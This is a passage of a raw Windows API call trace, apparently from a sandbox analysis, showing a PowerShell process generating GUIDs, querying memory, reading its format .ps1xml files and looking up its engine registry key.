[5]=0xef, [6]=0x7d, [7]=0x58))) returned 0x0 [0068.167] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xfbd51f8c, Data2=0xbcbb, Data3=0x434d, Data4=([0]=0x9a, [1]=0x33, [2]=0xc5, [3]=0x3, [4]=0x8a, [5]=0x3d, [6]=0x84, [7]=0x39))) returned 0x0 [0068.168] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xf1d7cfa, Data2=0xdb15, Data3=0x4d1e, Data4=([0]=0x9d, [1]=0x8b, [2]=0x4b, [3]=0x36, [4]=0x75, [5]=0xc3, [6]=0x8f, [7]=0xfb))) returned 0x0 [0068.168] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xba392626, Data2=0x1d15, Data3=0x44f0, Data4=([0]=0xa4, [1]=0xf7, [2]=0xbd, [3]=0x3d, [4]=0xfc, [5]=0x3f, [6]=0xb9, [7]=0xfc))) returned 0x0 [0068.168] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xbeba978d, Data2=0x4d5, Data3=0x45c9, Data4=([0]=0xb6, [1]=0xd3, [2]=0x41, [3]=0xfc, [4]=0xde, [5]=0x71, [6]=0x11, [7]=0x58))) returned 0x0 [0068.169] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe30b1eb7, Data2=0x9ef7, Data3=0x42ad, Data4=([0]=0x86, [1]=0x8b, [2]=0x81, [3]=0x89, [4]=0x2a, [5]=0xfd, [6]=0x64, [7]=0x5d))) returned 0x0 [0068.169] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x937dee26, Data2=0xf9e9, Data3=0x4108, Data4=([0]=0xa5, [1]=0x1d, [2]=0x58, [3]=0xca, [4]=0xdb, [5]=0x87, [6]=0x8a, [7]=0x4))) returned 0x0 [0068.169] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x6c9b0905, Data2=0x2142, Data3=0x4d0d, Data4=([0]=0xa5, [1]=0xf7, [2]=0xdb, [3]=0xdc, [4]=0x90, [5]=0x1f, [6]=0x6e, [7]=0x4a))) returned 0x0 [0068.170] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xf23f909, Data2=0x6bb5, Data3=0x43eb, Data4=([0]=0x86, [1]=0xef, [2]=0x8d, [3]=0x57, [4]=0x20, [5]=0x6c, [6]=0xd6, [7]=0x43))) returned 0x0 [0068.170] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xa52e5189, Data2=0xab08, Data3=0x40f2, Data4=([0]=0xbb, [1]=0x89, [2]=0x52, [3]=0xe3, [4]=0x70, [5]=0x66, [6]=0xc2, [7]=0x1c))) returned 0x0 [0068.170] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x5e9a765c, Data2=0x1b7f, Data3=0x4701, Data4=([0]=0xa2, [1]=0x62, [2]=0x70, [3]=0x79, [4]=0x58, [5]=0x62, [6]=0x66, [7]=0x8b))) returned 0x0 [0068.171] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x2ca01a6b, Data2=0x8cd4, Data3=0x4521, Data4=([0]=0xbb, [1]=0x1e, [2]=0xfc, [3]=0x3a, [4]=0x3f, [5]=0x61, [6]=0xc3, [7]=0x4e))) returned 0x0 [0068.171] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xd4e9e674, Data2=0xef8c, Data3=0x4866, Data4=([0]=0x9c, [1]=0xa8, [2]=0x38, [3]=0xb8, [4]=0x48, [5]=0xb3, [6]=0x47, [7]=0x9d))) returned 0x0 [0068.171] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x934d4737, Data2=0xebea, Data3=0x45c3, Data4=([0]=0xa4, [1]=0xbf, [2]=0xfb, [3]=0x36, [4]=0xf1, [5]=0xd0, [6]=0xcc, [7]=0xe4))) returned 0x0 [0068.172] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x76ae72b7, Data2=0x5c3d, Data3=0x4fa7, Data4=([0]=0xae, [1]=0xa4, [2]=0x81, [3]=0xd6, [4]=0x9c, [5]=0xd4, [6]=0xa0, [7]=0xcf))) returned 0x0 [0068.172] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xba88a93, Data2=0x4377, Data3=0x43d8, Data4=([0]=0x8e, [1]=0xfb, [2]=0x6, [3]=0x6, [4]=0xbd, [5]=0xbf, [6]=0x66, [7]=0xd9))) returned 0x0 [0068.172] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x670a3aa6, Data2=0x4e1a, Data3=0x4a51, Data4=([0]=0x9f, [1]=0x44, [2]=0x48, [3]=0x3a, [4]=0xa4, [5]=0x5e, [6]=0x77, [7]=0x7e))) returned 0x0 [0068.172] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xa2d8a703, Data2=0xb094, Data3=0x4ecb, Data4=([0]=0x85, [1]=0x33, [2]=0xf6, [3]=0x9c, [4]=0x6d, [5]=0x89, [6]=0xdc, [7]=0x5b))) returned 0x0 [0068.173] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xad7a3a0e, Data2=0x8bbe, Data3=0x4de6, Data4=([0]=0xb0, [1]=0x10, [2]=0xb6, [3]=0xc0, [4]=0x1e, [5]=0x87, [6]=0x13, [7]=0x2d))) returned 0x0 [0068.173] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.173] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.175] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.177] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xd5c31e14, Data2=0x30e5, Data3=0x482a, Data4=([0]=0xac, [1]=0x45, [2]=0xfe, [3]=0x95, [4]=0xf3, [5]=0x65, [6]=0x54, [7]=0x79))) returned 0x0 [0068.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0068.178] SetErrorMode (uMode=0x1) returned 0x1 [0068.178] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0068.178] GetFileType (hFile=0x314) returned 0x1 [0068.178] SetErrorMode (uMode=0x1) returned 0x1 [0068.178] GetFileType (hFile=0x314) returned 0x1 [0068.178] ReadFile (in: hFile=0x314, lpBuffer=0x3617198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3617198*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.180] ReadFile (in: hFile=0x314, lpBuffer=0x3617198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3617198*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.180] ReadFile (in: hFile=0x314, lpBuffer=0x3617198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3617198*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.180] ReadFile (in: hFile=0x314, lpBuffer=0x3617198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3617198*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.181] ReadFile (in: hFile=0x314, lpBuffer=0x3617198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3617198*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.182] ReadFile (in: hFile=0x314, lpBuffer=0x3617198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3617198*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.182] ReadFile (in: hFile=0x314, lpBuffer=0x3617198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3617198*, lpNumberOfBytesRead=0x12cff8*=0x119, lpOverlapped=0x0) returned 1 [0068.182] ReadFile (in: hFile=0x314, lpBuffer=0x3617198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3617198*, lpNumberOfBytesRead=0x12cff8*=0x0, lpOverlapped=0x0) returned 1 [0068.182] CloseHandle (hObject=0x314) returned 1 [0068.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0068.182] SetErrorMode (uMode=0x1) returned 0x1 [0068.182] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cfa0 | out: lpFileInformation=0x12cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0068.182] SetErrorMode (uMode=0x1) returned 0x1 [0068.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0068.183] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d088 | out: phkResult=0x12d088*=0x314) returned 0x0 [0068.183] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d00c, lpData=0x0, lpcbData=0x12d008*=0x0 | out: lpType=0x12d00c*=0x1, lpData=0x0, lpcbData=0x12d008*=0x56) returned 0x0 [0068.183] CoTaskMemAlloc (cb=0x5a) returned 0x23eaa0 [0068.183] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfdc, lpData=0x23eaa0, lpcbData=0x12cfd8*=0x56 | out: lpType=0x12cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfd8*=0x56) returned 0x0 [0068.183] CoTaskMemFree (pv=0x23eaa0) [0068.183] RegCloseKey (hKey=0x314) returned 0x0 [0068.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0068.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0068.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.185] VirtualQuery (in: lpAddress=0x12bb20, lpBuffer=0x12c9e0, dwLength=0x30 | out: lpBuffer=0x12c9e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.185] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x90ecdd37, Data2=0xaa9d, Data3=0x4b76, Data4=([0]=0xba, [1]=0x2e, [2]=0xfd, [3]=0x12, [4]=0xd5, [5]=0x78, [6]=0xaf, [7]=0x72))) returned 0x0 [0068.185] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.186] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x92c6198e, Data2=0x81aa, Data3=0x4ef8, Data4=([0]=0xbb, [1]=0x23, [2]=0x4d, [3]=0xab, [4]=0xff, [5]=0x6b, [6]=0x76, [7]=0xaf))) returned 0x0 [0068.186] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x46a8b8c0, Data2=0x2be3, Data3=0x4456, Data4=([0]=0xb1, [1]=0xc1, [2]=0xc4, [3]=0x77, [4]=0xb6, [5]=0x2d, [6]=0x78, [7]=0x8))) returned 0x0 [0068.186] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x35636554, Data2=0xc4ed, Data3=0x47ea, Data4=([0]=0x85, [1]=0x12, [2]=0x26, [3]=0xd7, [4]=0x6a, [5]=0xc1, [6]=0x2a, [7]=0x46))) returned 0x0 [0068.187] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.187] VirtualQuery (in: lpAddress=0x12bc60, lpBuffer=0x12cb20, dwLength=0x30 | out: lpBuffer=0x12cb20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0068.187] SetErrorMode (uMode=0x1) returned 0x1 [0068.187] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0068.187] GetFileType (hFile=0x314) returned 0x1 [0068.187] SetErrorMode (uMode=0x1) returned 0x1 [0068.188] GetFileType (hFile=0x314) returned 0x1 [0068.188] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.189] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.189] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.189] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.190] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.191] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.191] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.191] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.192] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.192] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.193] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.193] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.193] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.193] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.194] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.194] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.196] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.196] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.196] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.196] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.197] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.197] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.197] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.197] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.198] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.198] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.198] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.198] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.199] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.199] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.199] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.200] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.203] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.203] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.203] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.204] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.204] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.204] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, lpNumberOfBytesRead=0x12cff8*=0x1000, lpOverlapped=0x0) returned 1 [0068.204] ReadFile (in: hFile=0x314, lpBuffer=0x3673338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cff8, lpOverlapped=0x0 | out: lpBuffer=0x3673338*, 